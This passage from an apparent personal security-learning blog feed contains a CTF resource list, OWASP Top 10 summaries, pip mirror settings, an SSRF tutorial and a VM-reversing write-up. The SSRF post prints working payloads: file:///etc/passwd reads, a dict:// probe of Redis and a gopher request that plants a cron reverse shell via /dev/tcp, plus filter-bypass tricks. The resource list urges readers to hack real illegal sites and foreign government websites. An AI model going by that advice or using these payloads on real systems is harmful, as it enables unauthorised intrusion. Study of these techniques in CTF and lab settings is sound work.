round-ups:<br>~个人总结-网络安全学习和CTF必不可少的一些网站 - ida0918的博客 - CSDN博客 (a personal round-up of essential sites for security study and CTF, on CSDN)</p><p>II. Mid stage: play some CTFs with prize money; the good ones are fairly close to real-world work, for example HCTF in 2017. CTF schedules:<br>XCTF contest schedule: 首页 - XCTF社区<br>Schedule of major contests: All about CTF (Capture The Flag)<br>CTF guide: CTF Rank, your guide to CTF participation<br>CTF wiki: strongly recommended! CTF Wiki<br>2018 CTF competitions: 2018·CTF·信息安全竞赛导航</p><p>Blogs of some CTF veterans:<br>Hackfun - | Secblog | Pentest | Auditing | Sectool | CTF Write-up<br>Go0s @ 老 锥<br>Swing'Blog 有恨无人省<br><a href="http://haojiawei.xyz/page/3/">http://haojiawei.xyz/page/3/</a><br>pcat - 博客园<br>Si1ence's Blog - 雨一落,化开我眼中的冰,蔓延成河。<br>Medici.Yan's Blog<br>Radiation's blog<br><a href="http://l-team.org/">http://l-team.org/</a><br>Sebastian Neef - 0day.work<br><a href="https://www.jimwilbur.com/">https://www.jimwilbur.com/</a><br>M4x - 博客园<br>Of course, don't confine yourself to CTF contests. Use docker to reproduce CVE environments and play with them yourself, and follow P神 to learn code auditing, so that you don't get handed a site's source code and still not know how to get a shell. Some closed-source CMSs are easy to audit for holes.</p><p>Here I also recommend one of P神's projects, which uses docker-compose to reproduce vulnerable environments in one step.</p><p>vulhub/vulhub首页 | 离别歌vulhub/vulhub</p><p>III. Late stage: when those artificial environments no longer satisfy you, go for real targets.<br>Keep an eye on vulnerability alerts every day: Exploits Database by Offensive Security<br>Having picked a vulnerability, use Shodan to find affected hosts worldwide: Shodan Manual · GitBook<br>先知安全服务平台 (the Xianzhi security platform)<br>漏洞银行(BUGBANK) 官方网站 | 全球领先的漏洞发现平台 (BUGBANK)<br>补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC,库带计划 - 国内首个现金奖励漏洞平台 (Butian)<br>Some illegal sites, such as porn and gambling sites, can also be used for practice; they are illegal anyway, just don't try to profit from it.<br>Never touch mainland government websites. If you are itching, go after foreign government ones, since their people are practicing on our government too.</p>]]></content>
</entry>
<entry>
<title>OWASP Top 10: the ten most common vulnerabilities</title>
<link href="/2024/11/15/web%E5%8D%81%E5%A4%A7%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/"/>
<url>/2024/11/15/web%E5%8D%81%E5%A4%A7%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>Anyone doing penetration testing and bug hunting should know these fundamentals. My own understanding of them is still not very clear, which is why I am writing this article. The reverse-engineering material will have to come later; I don't know when reverse-wiki will open its doors.</p><p>OWASP (the Open Web Application Security Project) is an open community supported by the non-profit OWASP Foundation. It is open to everyone working to improve application security and aims to raise awareness of application security.<br>Its most authoritative output is the "Top 10 Most Critical Web Application Security Risks" list, which summarizes and periodically updates the ten most likely, most common and most dangerous vulnerabilities in web applications; it is essential knowledge for developers, testers, service and consulting staff.</p><h1 id="十大漏洞介绍"><a href="#十大漏洞介绍" class="headerlink" title="十大漏洞介绍"></a>The Top 10</h1><h2 id="注入漏洞"><a href="#注入漏洞" class="headerlink" title="注入漏洞"></a>Injection</h2><p>An injection vulnerability lets an attacker inject malicious code into an application and thereby gain control of it. Common injection flaws include SQL, OS command, ORM, LDAP and expression-language or OGNL injection. Attackers can use them to steal data, tamper with data, execute arbitrary code and more. There are many injection tools; worth introducing here is the Python-based sqlmap, which supports automated injection against PostgreSQL, MySQL, Access, MS SQL Server and other databases and is the most capable tool for checking for SQL injection.</p><h2 id="失效的身份认证"><a href="#失效的身份认证" class="headerlink" title="失效的身份认证"></a>Broken authentication</h2><p>Broken authentication means the application's authentication process has flaws, so an attacker can bypass the authentication mechanism to reach protected resources. Common examples include weak passwords, default passwords, brute force, session hijacking, session fixation and insecure password storage. Attackers can use these to impersonate legitimate users, steal user credentials, or gain unauthorized access to protected resources.</p><h2 id="敏感数据泄露"><a href="#敏感数据泄露" class="headerlink" title="敏感数据泄露"></a>Sensitive data exposure</h2><p>Sensitive data exposure means the application has flaws in how it handles sensitive data, so that the data leaks. Maintainers or developers may upload sensitive data by accident, as with files leaked via GitHub; permissions on sensitive files may be set wrongly, as with a database backup left under the web root; and the protocols or algorithms themselves may be weak, as with telnet, FTP or MD5. Common sensitive-data exposure flaws include insecure storage, insecure transport and insecure logging. Attackers can use them to steal users' personal information, financial information, trade secrets and so on. When handling sensitive data, use encryption, access control and secure transport to protect it.</p><h2 id="XML外部实体注入(XXE)"><a href="#XML外部实体注入(XXE)" class="headerlink" title="XML外部实体注入(XXE)"></a>XML External Entity injection (XXE)</h2><p>XML External Entity injection (XXE) means the attacker injects malicious XML entities into the application and thereby gains control of it. Common XXE flaws include insecure XML parsers, insecure XML configuration and insecure XML libraries. Attackers can use them to steal data, execute arbitrary code and more. When processing XML, use a secure XML parser, configuration and library, and disable external entity resolution.</p><h2 id="无效的访问控制"><a href="#无效的访问控制" class="headerlink" title="无效的访问控制"></a>Broken access control</h2><p>Broken access control means the application's access-control logic has flaws, so unauthorized users can reach protected resources. Common examples include incorrect permission checks, incorrect role checks and incorrect access-control policies. Attackers can use them to reach protected resources, steal data, tamper with data and more. When implementing access control, use strict permission checks, role checks and access-control policies, and make sure only authorized users can reach protected resources.<br>Path bypass: for example, a parameter used for reading is not checked, so a path bypass reads sensitive files<br>Privilege elevation: for example, permissions are not checked, so an attacker changes their privileges<br>Vertical privilege escalation: an attacker moves from an ordinary user's privileges to administrator privileges in the application<br>Horizontal privilege escalation: an attacker moves from ordinary user A's privileges to ordinary user B's privileges in the application</p><h2 id="安全配置错误"><a href="#安全配置错误" class="headerlink" title="安全配置错误"></a>Security misconfiguration</h2><p>Security misconfiguration means the application's configuration has flaws that expose it to risk. Common examples include insecure default configuration, insecure configuration files and insecure configuration parameters. Attackers can use them to take control of the application, steal data, execute arbitrary code and more. When configuring an application, use secure defaults, configuration files and parameters, and review and update the configuration regularly.</p><h2 id="跨站脚本(XSS)"><a href="#跨站脚本(XSS)" class="headerlink" title="跨站脚本(XSS)"></a>Cross-site scripting (XSS)</h2><p>Cross-site scripting (XSS) means the attacker injects malicious script into the application and thereby gains control of it. Common forms are reflected XSS, stored XSS and DOM-based XSS. Attackers can use them to steal users' personal information and session data, run malicious code and more. When handling user input, use safe encoding and filtering, and make sure only authorized users can reach protected resources.</p><h2 id="不安全的反序列化"><a href="#不安全的反序列化" class="headerlink" title="不安全的反序列化"></a>Insecure deserialization</h2><p>Insecure deserialization means the application's deserialization has flaws that let malicious data be deserialized into objects, giving the attacker control of the application. Common examples include insecure deserialization libraries and insecure deserialization configuration. Attackers can use them to execute arbitrary code, steal data and more. When deserializing data, use a secure library and configuration, and make sure only authorized users can deserialize data.</p><h2 id="使用含有已知漏洞的组件"><a href="#使用含有已知漏洞的组件" class="headerlink" title="使用含有已知漏洞的组件"></a>Using components with known vulnerabilities</h2><p>Using components with known vulnerabilities means the application was built with components that have known vulnerabilities, exposing it to risk. Common examples are libraries, frameworks and plugins with known vulnerabilities. Attackers can use them to take control of the application, steal data, execute arbitrary code and more. When building an application, use secure components and promptly update or patch any with known vulnerabilities.</p><h2 id="不足的日志记录和监控"><a href="#不足的日志记录和监控" class="headerlink" title="不足的日志记录和监控"></a>Insufficient logging and monitoring</h2><p>Insufficient logging and monitoring means the application's logging and monitoring have gaps, so security incidents cannot be detected and handled in time. Common examples are incomplete logging, inadequate log monitoring and slow response to what the logs show. Attackers can exploit these to hide their activity and evade security controls. Logging should be complete, monitoring thorough and response prompt, so that security incidents are detected and handled in time.</p>]]></content>
<categories>
<category>网络</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>Panda Burning Incense analysis</title>
<link href="/2024/11/15/%E7%86%8A%E7%8C%AB%E7%83%A7%E9%A6%99%E5%88%86%E6%9E%90/"/>
<url>/2024/11/15/%E7%86%8A%E7%8C%AB%E7%83%A7%E9%A6%99%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>I originally planned to do a "Nailong Burning Incense" (a play on the Panda Burning Incense worm), but today I don't really feel like it, so I'll first work through a few big web topics and see tomorrow whether I can reproduce it. Today's computers have such strong protection that Panda Burning Incense either gets killed immediately or doesn't match the system, which is a bit of a hassle.</p>]]></content>
</entry>
<entry>
<title>pip downloads</title>
<link href="/2024/11/07/pip%E4%B8%8B%E8%BD%BD/"/>
<url>/2024/11/07/pip%E4%B8%8B%E8%BD%BD/</url>
<content type="html"><![CDATA[<h1 id="pip下载"><a href="#pip下载" class="headerlink" title="pip下载"></a>pip downloads</h1><h2 id="下载"><a href="#下载" class="headerlink" title="下载"></a>Download</h2><pre><code class="hljs shell">pip install -i https://pypi.tuna.tsinghua.edu.cn/simple &lt;package&gt;<br></code></pre><h2 id="下载指定版本"><a href="#下载指定版本" class="headerlink" title="下载指定版本"></a>Download a specific version</h2><pre><code class="hljs shell">pip install -i https://pypi.tuna.tsinghua.edu.cn/simple &lt;package&gt;==&lt;version&gt;<br></code></pre><h2 id="永久配置国内镜像源"><a href="#永久配置国内镜像源" class="headerlink" title="永久配置国内镜像源"></a>Permanently configure a domestic mirror</h2><pre><code class="hljs shell">pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple<br></code></pre><h2 id="配置多个镜像源"><a href="#配置多个镜像源" class="headerlink" title="配置多个镜像源"></a>Configure multiple mirrors</h2><pre><code class="hljs ini"># pip.conf (pip.ini on Windows): pip's config parser rejects a repeated key,<br># so extra mirrors go in one multi-line extra-index-url value<br>[global]<br>index-url = https://pypi.tuna.tsinghua.edu.cn/simple<br>extra-index-url = https://pypi.douban.com/simple<br>    https://mirrors.aliyun.com/pypi/simple/<br></code></pre>]]></content>
<tags>
<tag>tool</tag>
</tags>
</entry>
<entry>
<title>ssrf</title>
<link href="/2024/11/07/ssrf/"/>
<url>/2024/11/07/ssrf/</url>
<content type="html"><![CDATA[<h1 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>Introduction</h1><p>SSRF (Server-Side Request Forgery) is a vulnerability in which the attacker constructs a request and the server sends it. The target of an SSRF attack is usually an internal system that cannot be reached from the internet (precisely because the request originates from the server, which can reach the internal systems connected to it but isolated from the outside).<br><a href="https://www.cnblogs.com/miruier/p/13907150.html">SSRF vulnerabilities (principles, where to look, exploitation, remediation advice)</a><br><a href="https://zhuanlan.zhihu.com/p/112055947">An in-depth study of the Gopher protocol in SSRF vulnerabilities</a></p><h1 id="具体内容"><a href="#具体内容" class="headerlink" title="具体内容"></a>Details</h1><h2 id="主要攻击方式"><a href="#主要攻击方式" class="headerlink" title="主要攻击方式"></a>Main attack methods</h2><ul><li>Port-scan the internet-facing network, the server's intranet or localhost and collect service banners</li><li>Attack applications running on the intranet or locally</li><li>Fingerprint intranet web applications to identify the organisation's internal assets</li><li>Attack internal and external web applications, mainly with attacks that need only an HTTP GET request (e.g. Struts2, SQLi)</li><li>Read local files via the file protocol, and so on<blockquote><p><a href="http://payloads.net/ssrf.php?url=192.168.1.10:3306">http://payloads.net/ssrf.php?url=192.168.1.10:3306</a><br><a href="http://payloads.net/ssrf.php?url=file:///c:/windows/win.ini">http://payloads.net/ssrf.php?url=file:///c:/windows/win.ini</a></p></blockquote></li></ul><h2 id="产生的相关函数"><a href="#产生的相关函数" class="headerlink" title="产生的相关函数"></a>Functions that give rise to it</h2><pre><code class="hljs php">file_get_contents(), fsockopen(), curl_exec(), fopen(), readfile()<br></code></pre><h3 id="函数解释"><a href="#函数解释" class="headerlink" title="函数解释"></a>Function explanations</h3><ol><li><p>file_get_contents()</p><pre><code class="hljs php">&lt;?php<br>// the URL comes straight from the request, so the server fetches whatever the caller names<br>$url = $_GET['url'];<br>echo file_get_contents($url);<br>?&gt;<br></code></pre><p>Fetches the content at the given URL into a string, which can then be saved under a file name or, as here, shown to the user; file_put_contents, by contrast, writes a string to a file.</p></li><li><p>fsockopen()</p><pre><code class="hljs php">function GetFile($host, $port, $link) {<br>    // open a raw TCP connection to the caller-supplied host and port, 30-second timeout<br>    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);<br>    if (!$fp) {<br>        echo "$errstr (error number $errno) \n";<br>    } else {<br>        // hand-build an HTTP request and write it to the socket<br>        $out  = "GET $link HTTP/1.1\r\n";<br>        $out .= "Host: $host\r\n";<br>        $out .= "Connection: Close\r\n\r\n";<br>        $out .= "\r\n";<br>        fwrite($fp, $out);<br>        // read the response until the peer closes the connection<br>        $contents = '';<br>        while (!feof($fp)) {<br>            $contents .= fgets($fp, 1024);<br>        }<br>        fclose($fp);<br>        return $contents;<br>    }<br>}<br></code></pre><p>fsockopen fetches the data at a user-specified URL by opening a TCP connection to the given port: $host is the host name, $port the port, $errstr receives the error as a string, and 30 is the timeout in seconds.</p></li><li><p>curl_exec()</p><pre><code class="hljs php">&lt;?php<br>if (isset($_POST['url'])) {<br>    $link = $_POST['url'];<br>    $curlobj = curl_init();  // create a new cURL resource<br>    curl_setopt($curlobj, CURLOPT_POST, 0);<br>    curl_setopt($curlobj, CURLOPT_URL, $link);<br>    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);  // set the URL and the relevant options<br>    $result = curl_exec($curlobj);  // fetch the URL and pass the result on to the browser<br>    curl_close($curlobj);  // close the cURL resource and free system resources<br><br>    $filename = './curled/' . rand() . '.txt';<br>    file_put_contents($filename, $result);<br>    echo $result;<br>}<br>?&gt;<br></code></pre><p>curl_exec executes the given cURL session.</p><blockquote><p>1. PHP normally does not enable the gopher wrapper for fopen<br>2. file_get_contents cannot URL-encode the gopher protocol<br>3. file_get_contents has a bug with gopher 302 redirects, which makes exploitation fail<br>4. curl/libcurl 7.43 has a bug in its gopher support (%00 truncation); 7.49 was tested to work<br>5. curl_exec() does not follow redirects by default<br>6. file_get_contents() supports the php://input protocol</p></blockquote></li></ol><h2 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>Exploitation methods</h2><ol><li>Using the file protocol (arbitrary file read)<blockquote><p>curl -vvv "<a href="http://target/ssrf.php?url=file:///etc/passwd">http://target/ssrf.php?url=file:///etc/passwd</a>"</p></blockquote></li><li>Using the dict protocol (retrieve Redis configuration information)<blockquote><p>curl -vvv "<a href="http://target/ssrf.php?url=dict://127.0.0.1:6379/info">http://target/ssrf.php?url=dict://127.0.0.1:6379/info</a>"</p></blockquote></li><li>Using the gopher protocol (the so-called universal protocol) (one-shot reverse Bash)<blockquote><p>curl -vvv “<a href="http://target/ssrf.php?url=gopher://127.0.0.1:6379/_*1">http://target/ssrf.php?url=gopher://127.0.0.1:6379/_*1</a> %0d %0a $8%0d %0aflushall %0d %0a<em>3 %0d %0a $3%0d %0aset %0d %0a $1%0d %0a1 %0d %0a $64%0d %0a %0d %0a %0a %0a</em>/1 * * * * bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 %0a %0a %0a %0a %0a %0d %0a %0d %0a %0d %0a<em>4 %0d %0a $6%0d %0aconfig %0d %0a $3%0d %0aset %0d %0a $3%0d %0adir %0d %0a $16%0d %0a/var/spool/cron/ %0d %0a</em>4 %0d %0a $6%0d %0aconfig %0d %0a $3%0d %0aset %0d %0a $10%0d %0adbfilename %0d %0a $4%0d %0aroot %0d %0a*1 %0d %0a $4%0d %0asave %0d %0aquit %0d %0a”</p></blockquote></li></ol><h2 id="SSRF漏洞绕过方法"><a href="#SSRF漏洞绕过方法" class="headerlink" title="SSRF漏洞绕过方法"></a>SSRF filter bypass methods</h2><p>Common bypass methods:</p><ol><li>@ in the URL: <a href="http://abc.com@127.0.0.1/">http://abc.com@127.0.0.1</a></li><li>Add a port number: <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080</a></li><li>Short URLs: <a href="https://0x9.me/cuGfD">https://0x9.me/cuGfD</a><br>Recommended: <a href="http://tool.chinaz.com/tools/dwz.aspx">http://tool.chinaz.com/tools/dwz.aspx</a>, <a href="https://dwz.cn/">https://dwz.cn/</a></li><li>Domains that resolve to an arbitrary IP, such as xip.io<br>This works through DNS resolution: xip.io can point at any address, so 127.0.0.1.xip.io resolves to 127.0.0.1</li><li>Write the IP address in another base: 192.168.0.1 = 3232235521 (decimal)</li><li>Non-HTTP protocols</li><li>DNS rebinding</li><li>Use [::]: http://[::]:80/ >>> <a href="http://127.0.0.1/">http://127.0.0.1</a></li><li>Full-width periods: 127。0。0。1 >>> 127.0.0.1</li><li>302 redirects: generate a redirecting link with <a href="https://tinyurl.com/">https://tinyurl.com</a></li></ol><h1 id="例题"><a href="#例题" class="headerlink" title="例题"></a>Example challenge</h1><h2 id="HNCTF-2022-WEEK2-ez-ssrf"><a href="#HNCTF-2022-WEEK2-ez-ssrf" class="headerlink" title="[HNCTF 2022 WEEK2]ez_ssrf"></a>[HNCTF 2022 WEEK2]ez_ssrf</h2><pre><code class="hljs php">&lt;?php<br>// challenge source as given; note that feof() is called on $data rather than on $fp<br>highlight_file(__FILE__);<br>error_reporting(0);<br>$data=base64_decode($_GET['data']);<br>$host=$_GET['host'];<br>$port=$_GET['port'];<br>$fp=fsockopen($host,intval($port),$error,$errstr,30);<br>if(!$fp) {<br>    die();<br>}<br>else {<br>    fwrite($fp,$data);<br>    while(!feof($data))<br>    {<br>        echo fgets($fp,128);<br>    }<br>    fclose($fp);<br>}<br></code></pre><p>Scanning for local files turns up flag.php; trying to read it returns "🥰localhost plz🥰", so it has to be read from localhost. Using the fsockopen call we construct a payload that makes the server send the request to itself. One pitfall: the data parameter must be built with PHP and base64-encoded, as below, otherwise it will not work.</p><blockquote><p>?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=</p></blockquote><pre><code class="hljs php">&lt;?php<br>// build the raw HTTP request the server will write to its own port 80, then base64 it for the data parameter<br>$out = "GET /flag.php HTTP/1.1\r\n";<br>$out .= "Host: 127.0.0.1\r\n";<br>$out .= "Connection: Close\r\n\r\n";<br>echo $out;<br>echo base64_encode($out);<br>?&gt;<br></code></pre><p>GET /flag.php HTTP/1.1<br>Host: 127.0.0.1<br>Connection: Close<br>R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=</p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>Reverse-engineering challenge-setting log</title>
<link href="/2024/11/05/%E9%80%86%E5%90%91%E5%87%BA%E9%A2%98%E8%AE%B0%E5%BD%95/"/>
<url>/2024/11/05/%E9%80%86%E5%90%91%E5%87%BA%E9%A2%98%E8%AE%B0%E5%BD%95/</url>
<content type="html"><![CDATA[<h1 id="逆向出题记录"><a href="#逆向出题记录" class="headerlink" title="逆向出题记录"></a>Reverse-engineering challenge-setting log</h1><p>Since we are setting challenges, and beginner ones at that, we first need to understand which kinds of challenge to set, what each one is for, and which tools it requires.<br>As for the types, beginner reversing challenges mainly cover these: base64, the TEA family, dynamic debugging, junk instructions, packing and decompilation, compression packers, z3, and mazes.<br>Let's test base64 first.</p><h2 id="2024-11-05"><a href="#2024-11-05" class="headerlink" title="2024-11-05"></a>2024-11-05</h2><h3 id="1-题目描述"><a href="#1-题目描述" class="headerlink" title="1. 题目描述"></a>1. Challenge description</h3><p>Challenge name: flag</p><p>Challenge description: flag{1234567890}</p><p>Challenge attachment: flag.exe</p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>ctf_vm virtual machine challenges</title>
<link href="/2024/11/02/ctf-vm%E8%99%9A%E6%8B%9F%E6%9C%BA/"/>
<url>/2024/11/02/ctf-vm%E8%99%9A%E6%8B%9F%E6%9C%BA/</url>
<content type="html"><![CDATA[<h1 id="ctf-vm虚拟机"><a href="#ctf-vm虚拟机" class="headerlink" title="ctf_vm虚拟机"></a>ctf_vm virtual machine challenges</h1><p>The big contests I have played recently all had a VM challenge, but I have not studied them in enough depth, and the Qiangwang Cup had one again this time, so I am taking the opportunity to open a new chapter and broaden both my skills and my horizons.</p><h2 id="HGAME-2023-week4-vm"><a href="#HGAME-2023-week4-vm" class="headerlink" title="[HGAME 2023 week4]vm"></a>[HGAME 2023 week4]vm</h2><p>Let's start with last year's HGAME to get a feel for it. This challenge is very good because plenty of write-ups already exist, so we can build on earlier analysis. Put simply, a VM challenge uses bytecode to re-implement a small virtual machine inside the program; it really just hides a few important assembly operations, and our job is to work out where each one happens and what it does.</p><ul><li>Packer check<br>It is a 64-bit EXE written in C++, with no packer.<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021001405.png"></li><li>IDA analysis<br>The entry is just a simple check, and we go straight into the VM.<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021004776.png"><br>This shows that the maximum opcode value is 255 (0xff).<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021005546.png"><br>Enter the VM's main function and analyse what each branch represents.<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021021368.png"><br>Let's look inside each function to see what happens.</li></ul><ol><li>mov<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021023687.png"></li><li>push &amp; pop<br>These two work the same way.<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021026035.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411021027121.png"></li><li>mul, the arithmetic unit<br>Like the arithmetic unit we studied in digital logic, a separate module handles the operations, namely [+, -, *, ^, <<, >>, 0].<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021031712.png"></li><li>cmp, the comparison unit<br>Obvious at a glance: as with cmp, equal gives 0 and unequal gives 1.<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021033928.png"></li><li>jmp, the jump unit<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021034959.png"></li><li>je and jne<br>Jump if equal and jump if not equal.<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021037299.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411021037492.png"></li></ol><p>That completes the analysis. Simple, right? There are only so many assembly instructions, and the ones that are commonly used and usable here are even fewer; careful analysis is all it takes.</p><ul><li>exp<br>Copied directly. This actually involves writing some IDC scripts; I will write a separate post later on using IDC scripts to decrypt SMC and strip junk instructions.<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span 
class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><code class="hljs python">opcode = [<span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x03</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x32</span>,<span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span 
class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x64</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x03</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x08</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x04</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x03</span>, <span class="hljs-number">0x05</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x01</span>, <span 
class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x28</span>,<span class="hljs-number">0x04</span>, <span class="hljs-number">0x06</span>, <span class="hljs-number">0x5F</span>, <span class="hljs-number">0x05</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>,<span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x96</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x04</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x88</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x01</span>,<span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span 
class="hljs-number">0x03</span>,<span class="hljs-number">0x01</span>, <span class="hljs-number">0x28</span>, <span class="hljs-number">0x04</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x63</span>, <span class="hljs-number">0xFF</span>, <span class="hljs-number">0xFF</span>]<br>input1 = []<br>i = <span class="hljs-number">0</span><br><span class="hljs-keyword">while</span> opcode[i] != <span class="hljs-number">0xFF</span>:<br> <span class="hljs-keyword">match</span> opcode[i]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x00</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span>'</span>, end=<span class="hljs-string">' '</span>)<br> o = i + <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> opcode[o]:<br> <span class="hljs-keyword">match</span> opcode[o]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x01</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mov input[reg[2]], reg[0]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x02</span>:<br> <span 